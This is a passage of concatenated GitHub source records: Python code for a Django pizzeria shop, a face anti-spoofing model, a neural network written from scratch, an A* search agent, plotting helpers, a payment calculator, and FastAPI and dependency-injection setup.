render(request,'register.html',context)\n\n\n\n\ndef home(request):\n return render(request,'home.html',{})\n\ndef menu(request):\n\tdata = cartData(request)\n\n\tcartItems = data['cartItems']\n\torder = data['order']\n\titems = data['items']\n\tproducts = Product.objects.all()\n\tcontext = {'products':products, 'cartItems':cartItems}\n\treturn render(request, 'menu.html', context)\n\n\n\n\n\ndef blog(request):\n return render(request,'blog.html',{})\n\ndef blogsingle(request):\n return render(request,'blog-single.html',{})\n\ndef loginPage(request):\n if request.method == 'POST':\n username = request.POST.get('username')\n 
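# both keys are assumed to match the input names in the login template\n 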
password = request.POST.get('password')\n\n user = authenticate(request, username=username, password=password)\n\n if user is not None:\n login(request, user)\n return redirect('home')\n else:\n messages.info(request, 'Username or Password is incorrect')\n\n context = {}\n return render(request,'login.html',context)\n\ndef logoutUser(request):\n logout(request)\n return redirect('login')\n\n\ndef contact(request):\n if request.method == \"POST\":\n message_name = request.POST['message-name']\n message_email = request.POST['message-email']\n message = request.POST['message']\n #send Email\n send_mail(\n message_name, #Subject\n message, #message_email\n message_email, #from Email\n ['pritamdebnath297@gmail.com'], #to email\n )\n return render(request,'contact.html',{'message_name':message_name})\n else:\n return render(request,'contact.html',{})\n\n\ndef about(request):\n return render(request,'about.html',{})\n\ndef services(request):\n return render(request,'services.html',{})\n\ndef cart(request):\n\tdata = cartData(request)\n\n\tcartItems = data['cartItems']\n\torder = data['order']\n\titems = data['items']\n\n\tcontext = {'items':items, 'order':order, 'cartItems':cartItems}\n\treturn render(request, 'cart.html', context)\n\n\n\ndef checkout(request):\n\tdata = cartData(request)\n\n\tcartItems = data['cartItems']\n\torder = data['order']\n\titems = data['items']\n\n\tcontext = {'items':items, 'order':order, 'cartItems':cartItems}\n\treturn render(request, 'checkout.html', context)\n\ndef updateItem(request):\n\tdata = json.loads(request.body)\n\tproductId = data['productId']\n\taction = data['action']\n\tprint('Action:', action)\n\tprint('Product:', productId)\n\n\tcustomer = request.user.customer\n\tproduct = Product.objects.get(id=productId)\n\torder, created = Order.objects.get_or_create(customer=customer, complete=False)\n\n\torderItem, created = OrderItem.objects.get_or_create(order=order, product=product)\n\n\tif action == 'add':\n\t\torderItem.quantity = (orderItem.quantity + 1)\n\telif action == 'remove':\n\t\torderItem.quantity = (orderItem.quantity - 1)\n\n\torderItem.save()\n\n\tif orderItem.quantity <= 0:\n\t\torderItem.delete()\n\n\treturn JsonResponse('Item was added', safe=False)\n\n\ndef processOrder(request):\n\ttransaction_id = datetime.datetime.now().timestamp()\n\tdata = json.loads(request.body)\n\n\tif request.user.is_authenticated:\n\t\tcustomer = request.user.customer\n\t\torder, created = Order.objects.get_or_create(customer=customer, complete=False)\n\telse:\n\t\tcustomer, order = guestOrder(request, data)\n\n\ttotal = float(data['form']['total'])\n\torder.transaction_id = transaction_id\n\n\tif total == order.get_cart_total:\n\t\torder.complete = True\n\torder.save()\n\n\tif order.shipping == True:\n\t\tShippingAddress.objects.create(\n\t\tcustomer=customer,\n\t\torder=order,\n\t\taddress=data['shipping']['address'],\n\t\tcity=data['shipping']['city'],\n\t\tstate=data['shipping']['state'],\n\t\tzipcode=data['shipping']['zipcode'],\n\t\t)\n\n\treturn JsonResponse('Payment submitted..', safe=False)\n","repo_name":"Pritam-deb/Pizzaria","sub_path":"main_page/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"15140980522","text":"import torch\nimport numpy as np\nfrom torchvision import transforms as T\n\n\nclass Antispoof:\n def __init__(self, model):\n self.model = model\n self.model.eval()\n\n def model_predict(self, frame):\n 
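\"\"\"Run one frame through the spoof classifier.\n\n Sketch of the assumed contract: frame is a single RGB image (PIL image or\n HxWx3 ndarray); returns (predicted class index, raw logits) as numpy arrays.\n \"\"\"\n 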
transform = T.Compose(\n [T.ToTensor(), T.Resize(size=(224, 224)), T.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5))]\n )\n frame = transform(frame)\n with torch.no_grad():\n logits = self.model(frame.unsqueeze(0))\n return torch.argmax(logits, dim=1).cpu().numpy(), np.array(logits)\n","repo_name":"MkSerdyuk/Face-Anti-Spoofing","sub_path":"face_antispoofing/antispoofing/antispoof.py","file_name":"antispoof.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"13328676414","text":"\"\"\"\r\nbabyNN_model\r\n~~~~~~~~~~~~~\r\nMy first Neural Network\r\nFrom scratch, no ML libraries\r\nwith lots and lots of help\r\nAntony Sikorski\r\n\"\"\"\r\n\r\n# Libraries\r\nimport numpy as np \r\nimport random\r\n\r\n\r\n\r\n# Sigmoid nonlinearity function\r\n# may add other nonlinearities, but for now using only sigmoid is fine\r\ndef sigmoid(z):\r\n a = 1.0 / (1 + np.exp(-z))\r\n return a\r\n\r\n# Need the derivative of sigmoid for backpropogation \r\ndef sigmoidPrime(z):\r\n aPrime = sigmoid(z)*(1 - sigmoid(z))\r\n return aPrime\r\n\r\n\r\n\r\nclass Network:\r\n\r\n def __init__(self, layerSizes, learnRate, miniBatchSize, numEpochs): \r\n\r\n \"\"\"\r\n Constructor for the Network class\r\n\r\n - layerSizes takes a list of layer sizes (input, hiddens, output) (int list)\r\n - learnRate is the learning rate (float)\r\n - miniBatchSize is the size of the mini batches when chopping up the data for \r\n stochastic gradient descent (int)\r\n - numEpochs is the number of training epochs (int)\r\n\r\n Also randomly generates the weights and biases by sampling from a normal \r\n (Gaussian) distribution with a mean 0 and variance 1. \r\n \"\"\"\r\n\r\n self.layerSizes = layerSizes\r\n self.numLayers = len(layerSizes)\r\n self.learnRate = learnRate\r\n self.miniBatchSize = miniBatchSize \r\n self.numEpochs = numEpochs\r\n # generates an array filled with column vectors of biases for \r\n # each layer following the input layer (based on number of neurons)\r\n self.biases = [np.random.randn(i, 1) for i in layerSizes[1:]]\r\n # generates an array filled with matrices of weights based on \r\n # the sizes of each layer (number of neurons)\r\n self.weights = [np.random.randn(j,i) for i,j in zip(layerSizes[:-1], layerSizes[1:])]\r\n\r\n \r\n \r\n def forward(self, a):\r\n \"\"\"\r\n The forward pass function. \r\n Takes the image input vector and returns the NN output vector based on \r\n the current weights and biases \r\n \"\"\"\r\n for b, w in zip(self.biases, self.weights):\r\n a = sigmoid(np.dot(w, a)+b)\r\n return a\r\n\r\n\r\n \r\n def forwardStore(self, a):\r\n \"\"\"\r\n Similar to the forward pass function except it stores each layer's activations\r\n and z vectors. To be used in backpropogation. \r\n Takes the image input vector and returns the lists of all z vectors and \r\n activations (including input, hidden, and output)\r\n \"\"\"\r\n activations = [a] \r\n zList = [] \r\n for b, w in zip(self.biases, self.weights):\r\n z = np.dot(w,a) + b\r\n zList.append(z)\r\n a = sigmoid(z) \r\n activations.append(a) \r\n\r\n return (zList, activations)\r\n\r\n\r\n\r\n # not yet being used, currently okay with just displaying accuracy \r\n def cost(self, output, correct, datLength):\r\n \"\"\"\r\n Calculates the cost/loss. Used for evaluating performance. Takes in the \r\n output of the NN, the desired output, and the length of the data. \r\n Returns a floating point value for the loss/cost. 
\r\n \"\"\"\r\n step1 = (output - correct)\r\n step2 = np.square(step1)\r\n loss = 0.5 * np.sum(step2)/(datLength)\r\n return loss\r\n\r\n\r\n\r\n def costPrime(self, output, correct):\r\n \"\"\"\r\n Derivative of the cost function. Takes in the output of the NN\r\n and the desired output. Returns the difference vector. Used \r\n in backpropogation. \r\n \"\"\"\r\n return(output-correct)\r\n \r\n\r\n\r\n def backward(self, imageInput, correct):\r\n \"\"\"\r\n The backpropogation function. Most important bit in this whole file. Takes in the \r\n actual image input vector (784x1) and the desired output vector (10x1), and \r\n calculates the gradient in order to updates the weights and biases for one step. \r\n Returns two lists: A list of matrices for the weight gradient, and a list of vectors\r\n for the bias gradient. \r\n\r\n Note: the * operation between two vectors below represents the Hadamard product, \r\n which is just elementwise multiplication of two vectors of the same shape. It\r\n results in a vector of the same shape as the original two. \r\n \"\"\"\r\n\r\n # initializes empty arrays of the same shapes so that we can conveniently put the gradient in \r\n weightGradient = [np.zeros(w.shape) for w in self.weights]\r\n biasGradient = [np.zeros(b.shape) for b in self.biases]\r\n\r\n # Forward pass\r\n # saved lists of z vectors and activations for each layer\r\n zList, activations = self.forwardStore(imageInput)\r\n\r\n\r\n # Backward pass\r\n # all updates will need this constant\r\n constant = self.costPrime(activations[-1], correct) * sigmoidPrime(zList[-1])\r\n\r\n for i in range(1, self.numLayers):\r\n\r\n # for i = 1, initializes the partial deriv equations\r\n if i == 1:\r\n biasGradient[-i] = constant\r\n weightGradient[-i] = np.dot(constant, activations[-i-1].transpose())\r\n \r\n # for i > 1, you effectively just keep multiplying them by the weight of the layer after and\r\n # the sigmoid of the current z\r\n else:\r\n constant = np.dot(self.weights[-i+1].transpose(), constant) * sigmoidPrime(zList[-i])\r\n biasGradient[-i] = constant\r\n weightGradient[-i] = np.dot(constant, activations[-i-1].transpose())\r\n\r\n return (weightGradient, biasGradient)\r\n\r\n\r\n\r\n def train(self,training_data, test_data = None):\r\n \"\"\"\r\n Here we train our NN using stochastic gradient descent with mini batches. We iterate over \r\n multiple epochs (complete training cycles). \r\n\r\n In each epoch, we cut the data up into mini batches, compute the gradient using \r\n backpropogation for each entry in the mini batch, and then calculate the average per\r\n mini batch and use that and the learning rate to update our weights and biases. \r\n We repeat this until we have gone through all of the mini batches, and that is considered \r\n a completed epoch. \r\n\r\n The functions takes in the training_data and testing_data. It first trains the network on \r\n the training_data in each epoch as described above, and then applies that set of weights and\r\n biases to the testing data. The epoch, along with the accuracy/success rate of the network \r\n on the corresponding testing data is so that progress can be tracked. \r\n\r\n The test_data parameter is set to None by default, so that we have the option of training \r\n the network and not doing any testing. If test data is provided, accuracy will be shown. 
\r\n \"\"\"\r\n training_data = list(training_data)\r\n\r\n #represents one whole cycle of training and testing\r\n for i in range(self.numEpochs):\r\n \r\n #randomly shuffled so that we get different mini-batches in each iteration\r\n random.shuffle(training_data)\r\n #cut into mini batches using list comprehension\r\n miniBatches = [training_data[ind: ind + self.miniBatchSize] for ind in range(0, len(training_data), self.miniBatchSize)]\r\n\r\n #iterating over each mini batch \r\n for miniBatch in miniBatches: \r\n \r\n #lists to keep a running total of the gradient\r\n weightTotalGrad = [np.zeros(w.shape) for w in self.weights]\r\n biasTotalGrad = [np.zeros(b.shape) for b in self.biases]\r\n\r\n #iterating over each image/classification tuple in the mini batch\r\n for x,y in miniBatch:\r\n\r\n #backpropogation \r\n weightGradUpdate, biasGradUpdate = self.backward(x,y)\r\n\r\n #update the running total\r\n weightTotalGrad = [total + update for total, update in zip(weightTotalGrad, weightGradUpdate)]\r\n biasTotalGrad = [total + update for total, update in zip(biasTotalGrad, biasGradUpdate)]\r\n \r\n # the average gradient is computed, then multiplied by the learning rate\r\n # this is then used to update our weights and biases \r\n self.weights = [weights - (self.learnRate/len(miniBatch)) * update for weights, update in zip(self.weights, weightTotalGrad)]\r\n self.biases = [bias - (self.learnRate/len(miniBatch)) * update for bias, update in zip(self.biases, biasTotalGrad)]\r\n\r\n if test_data: \r\n test_data = list(test_data)\r\n\r\n # epoch and accuracy of the network is printed each time if testing data is provided \r\n print(\"Epoch \", i + 1, \" complete\")\r\n results = [(np.argmax(self.forward(x)), y) for (x, y) in test_data]\r\n numCorrect = sum(int(classified == actual) for classified, actual in results)\r\n print(\"Accuracy: \", numCorrect, \"/\", len(test_data), \"\\n\")\r\n\r\n\r\n #In the future maybe also print the loss number to show that it is decreasing\r\n \r\n \r\n #shows which epoch we are on if no test data is provided \r\n else: \r\n print(\"Epoch \", i + 1, \" complete\")\r\n\r\n\r\n\r\n # not yet being used, currently okay with just displaying accuracy \r\n def cost(self, output, correct, datLength):\r\n \"\"\"\r\n Calculates the cost/loss. Used for evaluating performance. Takes in the \r\n output of the NN, the desired output, and the length of the data. \r\n Returns a floating point value for the loss/cost. 
\r\n \"\"\"\r\n step1 = (output - correct)\r\n step2 = np.square(step1)\r\n loss = 0.5 * np.sum(step2)/(datLength)\r\n return loss","repo_name":"antonyxsik/NeuralNetFromScratch","sub_path":"model_NN.py","file_name":"model_NN.py","file_ext":"py","file_size_in_byte":9855,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"74137970978","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 15 01:33:34 2022\n\n@author: dekom\n\"\"\"\nfrom include.astarastar import aStarSearch\nimport time\n\nclass astaragent(object): \n \n def __init__(self, agentNumber, position, target, maxDepth, reservedMap):\n #definition: initial the agent\n #Parameters: tree: search tree #position: the agent's current position #target: the agent's goal position \n #eDistance: the alpha in the determing function, decide the resolution #plotb: if plot the path\n #Returns: None\n self.agentNumber = agentNumber\n self.maxDepth = maxDepth\n self.position = position #current position of agent in (x, y)\n self.target = target #current target position in (x, y)\n self.bestPath = False #false means need to search, True means searching, \n self.reservedMap = reservedMap\n self.history = []\n self.arrive = False\n self.searchtime = 0\n \n def searchAndPlot(self):\n #definition: find the required nodes.\n #save the results of the search\n time_start = time.time()\n #print('searching the best path...')\n if self.bestPath != False:\n return self\n self.arrive = self.ifArrive()\n if self.arrive == False:\n actionList, path, nodeList, count, explored = aStarSearch(self.position, self.target, self.reservedMap, self.maxDepth)\n if path == False:\n self.setBestPath(path)\n return False\n self.setBestPath(path)\n #reserve\n for n in path:\n self.reservedMap[n] = self.agentNumber\n time_end = time.time()\n self.searchtime += time_end - time_start\n #self.plotTree()\n return self\n \n def move(self):\n #definition: move the agent to the new position\n #Parameters: step: how many steps the agent will go along the path\n #Returns: None\n self.arrive = self.ifArrive()\n if self.arrive == False:\n #check path movable\n moveable = True\n for n in self.bestPath:\n if self.reservedMap[n] == 100 or self.reservedMap[n] == 101:\n moveable = False\n if moveable and self.reservedMap[self.bestPath[0]] == self.agentNumber:\n self.reservedMap[self.position] = 0\n self.position = self.bestPath.pop(0)\n self.history.append(self.position)\n print(\"agent\", self.agentNumber, \" has arrived \",self.position )\n else:\n #cancel previous resercation\n for n in self.bestPath:\n if self.reservedMap[n] == self.agentNumber:\n self.reservedMap[n] = 0\n self.bestPath = False\n print(\"agent\", self.agentNumber, \" is blocked, redo search \")\n \n\n else:\n print(\"agent\", self.agentNumber, \" has arrived\")\n \n def ifArrive(self):\n if self.position[0] == self.target[0] and self.position[1] == self.target[1]:\n return True\n else:\n return False\n \n def setBestPath(self, bestPath):\n #set the best path\n self.bestPath = bestPath\n \n","repo_name":"Xiaoshan-jun/QuadtreeForAerospaceAgentSearch","sub_path":"include/astaragent.py","file_name":"astaragent.py","file_ext":"py","file_size_in_byte":3250,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"32260732195","text":"# Author: Mathurin Massias \n# License: BSD 3 clause\n\nimport os\nimport matplotlib\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom matplotlib import rc\n\nC_LIST = 
sns.color_palette(\"colorblind\", 8)\nC_LIST_DARK = sns.color_palette(\"dark\", 8)\n\n\ndef configure_plt(fontsize=10, poster=True):\n rc('font', **{'family': 'sans-serif',\n 'sans-serif': ['Computer Modern Roman']})\n usetex = matplotlib.checkdep_usetex(True)\n params = {'axes.labelsize': fontsize,\n 'font.size': fontsize,\n 'legend.fontsize': fontsize,\n 'xtick.labelsize': fontsize - 2,\n 'ytick.labelsize': fontsize - 2,\n 'text.usetex': usetex,\n 'figure.figsize': (8, 6)}\n plt.rcParams.update(params)\n\n sns.set_palette('colorblind')\n sns.set_style(\"ticks\")\n if poster:\n sns.set_context(\"poster\")\n\n\ndef _plot_legend_apart(ax, figname, ncol=None):\n \"\"\"Do all your plots with fig, ax = plt.subplots(),\n don't call plt.legend() at the end but this instead\"\"\"\n if ncol is None:\n ncol = len(ax.lines)\n fig = plt.figure(figsize=(30, 4), constrained_layout=True)\n fig.legend(ax.lines, [line.get_label() for line in ax.lines], ncol=ncol,\n loc=\"upper center\")\n fig.tight_layout()\n fig.savefig(figname, bbox_inches=\"tight\")\n os.system(\"pdfcrop %s %s\" % (figname, figname))\n return fig\n\n\ndict_algo_name = {}\ndict_algo_name[\"pgd\", False] = \"GD\"\ndict_algo_name[\"cd\", False] = \"CD\"\ndict_algo_name[\"bcd\", False] = \"BCD\"\ndict_algo_name[\"pgd\", True] = \"GD - Anderson\"\ndict_algo_name[\"cd\", True] = \"CD - Anderson\"\ndict_algo_name[\"bcd\", True] = \"BCD - Anderson\"\ndict_algo_name[\"rcd\", False] = \"RCD\"\ndict_algo_name[\"rbcd\", False] = \"RBCD\"\ndict_algo_name[\"fista\", False] = \"GD - inertial\"\ndict_algo_name[\"apcg\", False] = \"CD - inertial\"\n\n\ncurrent_palette = sns.color_palette(\"colorblind\")\ndict_color = {}\ndict_color[\"pgd\"] = current_palette[0]\ndict_color[\"fista\"] = current_palette[0]\ndict_color[\"cd\"] = current_palette[1]\ndict_color[\"bcd\"] = current_palette[1]\ndict_color[\"rcd\"] = current_palette[4]\ndict_color[\"rbcd\"] = current_palette[4]\ndict_color[\"apcg\"] = current_palette[1]\n","repo_name":"mathurinm/andersoncd","sub_path":"andersoncd/plot_utils.py","file_name":"plot_utils.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"34"} +{"seq_id":"2189550504","text":"from dotenv import load_dotenv\nload_dotenv()\nimport os\nfrom dependency_injector import containers, providers\n\nfrom .database import Database\nfrom .repositories import UserRepository, SupportOptionRepository\nfrom .services import UserService, SupportOptionService\n\n\nclass Container(containers.DeclarativeContainer):\n\n wiring_config = containers.WiringConfiguration(modules=[\".endpoints\"])\n\n db = providers.Singleton(Database, db_url=os.getenv('DATABASE_CONNECTION_STRING'))\n\n user_repository = providers.Factory(\n UserRepository,\n session_factory=db.provided.session\n )\n\n support_option_repository = providers.Factory(\n SupportOptionRepository,\n session_factory=db.provided.session\n )\n\n user_service = providers.Factory(\n UserService,\n user_repository=user_repository,\n )\n\n support_option_service = providers.Factory(\n SupportOptionService,\n user_repository=user_repository,\n support_option_repository=support_option_repository\n )","repo_name":"scdest/FastApiPatreon","sub_path":"app/containers.py","file_name":"containers.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"38165637402","text":"import sys\nimport logging\n\n# Rates to be applied to 
employees payment calculator\nrates = {\n 'MO': [\n # Rate for hour range\n # (from, to, rate)\n (0, 9, 25),\n (9, 18, 15),\n (18, 24, 20),\n ],\n 'TU': [\n (0, 9, 25),\n (9, 18, 15),\n (18, 24, 20),\n ],\n 'WE': [\n (0, 9, 25),\n (9, 18, 15),\n (18, 24, 20),\n ],\n 'TH': [\n (0, 9, 25),\n (9, 18, 15),\n (18, 24, 20),\n ],\n 'FR': [\n (0, 9, 25),\n (9, 18, 15),\n (18, 24, 20),\n ],\n 'SA': [\n (0, 9, 30),\n (9, 18, 20),\n (18, 24, 25),\n ],\n 'SU': [\n (0, 9, 30),\n (9, 18, 20),\n (18, 24, 25),\n ],\n}\n\n\nclass RateNotDefined(Exception):\n \"\"\"Exception to be called when the rate is not defined for a range\"\"\"\n \n def __init__(self, day, hour) -> None:\n super().__init__(f\"No rate is defined for day: '{day}' and hour: '{hour}-{hour+1}'\")\n\n\ndef get_rate(day: str, hour: int) -> int:\n \"\"\"Get the rate corresponding to certain hour in a day.\n\n Args:\n day (str): Day of the week, in a 2 letters format. [MO-SU]\n hour (int): Hour of the day to evaluate\n\n Raises:\n RateNotDefined: If the hour-rate table does not include the rate for the \n specified day-hour, this error will be raised\n\n Returns:\n int: Rate for this specific day-hour combination to be paid.\n \"\"\"\n for range_start, range_end, rate in rates[day.upper()]:\n if hour in range(range_start, range_end):\n return rate\n raise RateNotDefined(day, hour)\n\n\ndef rate_calculator(employee_data: str) -> str:\n \"\"\"Function to calculate the total amount to be paid an employee \n based on the hours they worked and the times during which they worked.\n\n Args:\n employee_data (str): input text to be processed.\n Example 1: RENE=MO10:00-12:00,TU10:00-12:00,TH01:00-03:00,SA14:00-18:00,SU20:00-21:00 \n Example 2: ASTRID=MO10:00-12:00,TH12:00-14:00,SU20:00-21:00\n\n Returns:\n str: Total amount to be paid to the employee in the format: The amount to pay {EMPLOYEE} is: {AMOUNT} USD\n \"\"\"\n pay_to = employee_data.split('=')[0]\n worked_hours = employee_data.split('=')[1]\n to_be_paid = 0\n for day_worked in worked_hours.split(','):\n day = day_worked[0:2]\n to_be_paid_for_this_day = 0\n for hour_worked in range(int(day_worked[2:4]), int(day_worked[8:10])):\n to_be_paid_for_this_day += get_rate(day, hour_worked)\n to_be_paid += to_be_paid_for_this_day\n return f'The amount to pay {pay_to} is: {to_be_paid} USD'\n\n\ndef process_file(txt_filename: str) -> None:\n \"\"\"Process a .txt file to extract and calculate the exact amount to be paid\n to every employee in the file based on their worked hours\n\n Args:\n txt_filename (str): Filename of the desired .txt file to be processed\n \"\"\"\n try:\n with open(txt_filename, 'r') as content:\n for line in content:\n print(rate_calculator(line))\n except FileNotFoundError:\n logging.error(f'File: {txt_filename} not found')\n\nif __name__ == '__main__':\n # Check if filename is passed from command line as a positional argument.\n if len(sys.argv) > 1:\n process_file(sys.argv[1])\n exit()\n\n # If the filename is not in the arguments, ask for it\n print('Please input the .txt filename')\n print('txt file should be in the same folder of this script.')\n txt_filename = input(\"filename: \")\n process_file(txt_filename)\n","repo_name":"cesar128/Payment_calculator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"73652257696","text":"from django.urls import path\nfrom accounts import views as accounts_views\nfrom django.contrib.auth import 
views as auth_views\n\n# For Navbar Rendering\nfrom shop.models import Category_A, Category_B\ncategories_A = Category_A.objects.all() \ncategories_B = Category_B.objects.all()\ncontext = {\n 'categories_A': categories_A,\n 'categories_B': categories_B,\n }\n\nurlpatterns = [\n path('', accounts_views.profile, name='profile'),\n path('sign_up/', accounts_views.sign_up, name='sign_up'),\n path('login/',auth_views.LoginView.as_view(extra_context=context),name='login'),\n path('logout/',auth_views.LogoutView.as_view(extra_context=context),name='logout'),\n \n]\n\n# Custom LoginView : as_view(extra_context{\"tag\":Var}) :https://stackoverflow.com/questions/55107971/custom-loginview-django-extra-context","repo_name":"jeyu54217/django_ecommerce","sub_path":"Demo/accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"72868574816","text":"class Table(object):\n def config_db(self,pkg):\n tbl=pkg.table('faldone', pkey='id', name_long='Faldone', \n name_plural='Faldoni',caption_field='numero', partition_agency_id='agency_id')\n self.sysFields(tbl,counter=True)\n tbl.column('numero', name_short='!![en]Number')\n tbl.column('agency_id',size='22', name_long='agency_id'\n ).relation('agency.id', relation_name='faldone_agency_id', mode='foreignkey', onDelete='raise')\n tbl.column('dal', dtype='D', name_long='!![en]Date from')\n tbl.column('al', dtype='D', name_long='!![en]Date to')\n def defaultValues(self):\n return dict(agency_id=self.db.currentEnv.get('current_agency_id'))\n\n ","repo_name":"codicem69/shipsteps","sub_path":"packages/shipsteps/model/faldone.py","file_name":"faldone.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"28934654925","text":"'''\nCreated on 01/04/2014\n\n@author: jacekrad\n'''\nfrom __future__ import print_function\nfrom sequence import *\n\nblosum62_matrix = readSubstMatrix(\"../blosum62.matrix\", Protein_Alphabet)\n\np450_aln = readClustalFile(\"../p450.aln\", Protein_Alphabet)\np450_matrix = p450_aln.calcSubstMatrix()\np450_matrix.writeFile(\"p450.matrix\")\n\n\nrhodopsin_aln = readClustalFile(\"../rhodopsin.aln\", Protein_Alphabet)\nrhodopsin_matrix = rhodopsin_aln.calcSubstMatrix()\nrhodopsin_matrix.writeFile(\"rhodopsin.matrix\")\n\nprint (\"=================================== BLOSUM62 =======================================\", file=sys.stderr)\nprint (blosum62_matrix, file=sys.stderr)\nprint (\"===================================== P450 =========================================\", file=sys.stderr)\nprint (p450_matrix, file=sys.stderr)\nprint (\"================================== RHODOPSIN =======================================\", file=sys.stderr)\nprint (rhodopsin_matrix, file=sys.stderr)\n\n# deltas in the score matrices between blosum62 and out p450 & rhodopsin\np450_deltas = {}\nrhodopsin_deltas = {}\n\n# for each residue pair calculate the delta between blosum62 and our scores\nfor key_pair in blosum62_matrix.scoremat:\n p450_deltas[key_pair] = p450_matrix.scoremat[key_pair] - blosum62_matrix.scoremat[key_pair]\n rhodopsin_deltas[key_pair] = rhodopsin_matrix.scoremat[key_pair] - blosum62_matrix.scoremat[key_pair]\n\n#for key_pair in p450_deltas:\n# print(p450_deltas[key_pair], \",\", key_pair, file=sys.stdout)\n \nfor key_pair in rhodopsin_deltas:\n print(rhodopsin_deltas[key_pair], \",\", key_pair, 
file=sys.stdout)\n","repo_name":"jacekrad/scie2100","sub_path":"prac02/practwo/q5.py","file_name":"q5.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"41616455350","text":"# Python3 program to find the smallest window\n# containing all characters of a pattern.\nno_of_chars = 256\n\n# Function to find smallest window containing all characters of 'pat'\ndef findSubString(string, pat):\n    hash_pat = [0] * no_of_chars\n    hash_str = [0] * no_of_chars\n    for i in pat:\n        hash_pat[ord(i)] += 1\n\n    start = 0\n    count = 0\n    end = len(string) - 1\n    minlenth = 1000\n    res = \"\"\n\n    for j in range(0, len(string)):\n        # print(string[j])\n        hash_pat[ord(string[j])] -= 1\n        if hash_pat[ord(string[j])] >= 0:\n            # print(\"found\",string[j])\n            count += 1\n        while count == len(pat):\n            print(\"first take\", start)\n            if minlenth > j - start + 1:\n                minlenth = j - start + 1\n                res = string[start:j + 1]\n                print(\"Result:\", res)\n            hash_pat[ord(string[start])] += 1\n            if hash_pat[ord(string[start])] > 0:\n                print(\"here\")\n                count -= 1\n            start += 1\n\n    return res\n\n\n# Driver code\nif __name__ == \"__main__\":\n    string = \"cccaaaabweeefgewcwaefgcf\"\n    pat = \"cae\"\n\n    print(\"Smallest window is : \")\n    print(findSubString(string, pat))\n","repo_name":"lamakmudgal/Practice","sub_path":"ArraysStrings/smallestsubtring.py","file_name":"smallestsubtring.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"12811365202","text":"from src.Database.CourseMapper import CourseMapper\nimport pytest\nfrom unittest.mock import Mock\n\n\ndef test_load():\n\n    cm = CourseMapper.getInstance()\n    course_id = \"241\"\n    department = \"POTS\"\n    cm._CourseMapper__load_lab = Mock()  # use the name-mangled attribute so the private method is actually replaced by the mock\n    rv = cm.load(course_id=course_id, department=department)\n    cm._CourseMapper__load_lab.assert_not_called()\n    assert rv.__class__.__name__ == 'Course'\n","repo_name":"noahpselman/oop","sub_path":"src/tests/Database/test_CourseMapper.py","file_name":"test_CourseMapper.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"70081715297","text":"from fastapi import APIRouter, Request as RequestFastApi\nfrom fastapi.responses import JSONResponse\n\nfrom src.main.adapters import request_adapter\n\nfrom src.validators import get_starships_validator\nfrom src.validators import get_starship_information_validator\n\nfrom src.main.composers import get_starship_information_composer\nfrom src.main.composers import get_starships_in_paginagion\n\nfrom src.presenters.errors import handle_error\n\nstarships_routes: APIRouter = APIRouter()\n\n\n@starships_routes.get(\"/api/starships/list\")\nasync def get_starships_in_page(request: RequestFastApi):\n    \"\"\"\n    List of starships\n    :param request:\n    :return:\n    \"\"\"\n\n    response = None\n    controller = get_starships_in_paginagion()\n\n    try:\n        await get_starships_validator(request)\n        response = await request_adapter(request, controller.handler)\n    except Exception as error:\n        response = handle_error(error)\n\n    return JSONResponse(status_code=response[\"status_code\"], content=response[\"data\"])\n\n\n@starships_routes.post(\"/api/starship/information\")\nasync def get_starship_information(request: RequestFastApi):\n    \"\"\"get_starship_information _summary_\n\n    _extended_summary_\n\n    Parameters\n    ----------\n    request : RequestFastApi\n        _description_\n\n    Returns\n    
-------\n _type_\n _description_\n \"\"\"\n\n response = None\n controller = get_starship_information_composer()\n\n try:\n await get_starship_information_validator(request)\n response = await request_adapter(request, controller.handler)\n except Exception as error:\n response = handle_error(error)\n\n return JSONResponse(status_code=response[\"status_code\"], content=response[\"data\"])\n","repo_name":"FilipeNMarques/learning-requests-python","sub_path":"src/main/routes/starships_routes.py","file_name":"starships_routes.py","file_ext":"py","file_size_in_byte":1705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"23466923264","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nA cross platform interface to libmagic.\n\"\"\"\ntry:\n from winmagic import magic\nexcept ModuleNotFoundError:\n import os\n if os.name == 'nt':\n # Attempting to import magic on Windows without winmagic being\n # installed may result in an uncontrolled crash.\n magic = None\n else:\n try:\n import magic\n except ImportError:\n magic = None\n\n\ndef magicparse(data, *args, **kwargs):\n if magic:\n data = bytes(data) if not isinstance(data, bytes) else data\n return magic.Magic(*args, 